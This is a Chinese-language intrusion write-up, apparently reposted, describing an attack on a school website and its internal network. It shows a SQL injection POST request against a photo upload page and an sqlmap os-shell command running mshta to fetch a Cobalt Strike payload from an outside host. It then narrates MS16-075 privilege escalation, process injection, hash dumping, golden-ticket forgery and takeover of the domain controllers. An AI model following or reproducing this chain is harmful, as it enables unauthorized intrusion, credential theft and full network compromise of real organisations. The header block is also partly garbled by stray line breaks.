首先我們發現目標站:www.xxxxx.xx
<code>脆弱點:http://www
.xxxxx.xx/PhotoUpload/%E5%AD%B8%E7%94%9F%E8%AD%89%E4%BB%B6%E7%85%A7%E4%B8%8A%E5%82%B3.asp/<code>
SQL注入POST包:
<code>POST /PhotoUpload/%E5%AD%B8%E7%94%9F%E8%AD%89%E4%BB%B6%E7%85%A7%E4%B8%8A%E5%82%B3.asp HTTP/1.1
Host: www.xxxxx.xxContent-Length:31
Cache-Control: max-age=0Origin: http://www
.xxxxx.xxUpgrade-Insecure-Requests:1
Content-Type: application/x
-www-form-urlencodedUser-Agent: Mozilla/5.0
(Windows NT10.0
; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/80.0
.3987.132
Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q
=0
.9
,image/webp,image/apng,*/*;q=0.8,application/signed
-exchange;v=b3;q
=0
.9
Referer: http://www
.xxxxx.xx/PhotoUpload/%E5%AD%B8%E7%94%9F%E8%AD%89%E4%BB%B6%E7%85%A7%E4%B8%8A%E5%82%B3.aspAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q
=0
.9
Cookie: ASPSESSIONIDQCABSDCS=DBGDAIKBDEHOPFOFPEAPPLBBConnection: closetxtSchoolYear=108
B&txtStdID=1234
/<code>
權限:DBA(SA)
內網橫向
CS設置好HTTPS監聽器,生成一個html application文件
然後傳到CS服務器上
sqlmap在os-shell下執行mshta http://20*.*.*.2*:80/download/file.txt
過一會有臺主機上線了
設置好beacon回連時間後檢查下服務器的環境
存在域
他這裡的補丁安裝的較多
<code>複製信息到https
:/<code>
發現漏補MS16-075
<code>在github上找到了該exp
的cna插件https:/<code>
clone回來加載到CS裡
獲取到了system權限的beacon
需要注意的是目前進程的父進程是mssql,需要注入到其他用戶的進程下,否則執行一些命令時會提示權限不夠
選擇了WEGO的用戶注入
查看域控
根據備註,判斷AD1為主域控,AD2、AD3為輔域控
抓下hash然後備用
接管域控
利用抓到的hash偽造金票
然後接管AD1
再從AD1上抓hash
在AD1上抓到了域管的明文密碼
然後批量梭哈
文章腳本收集,侵權刪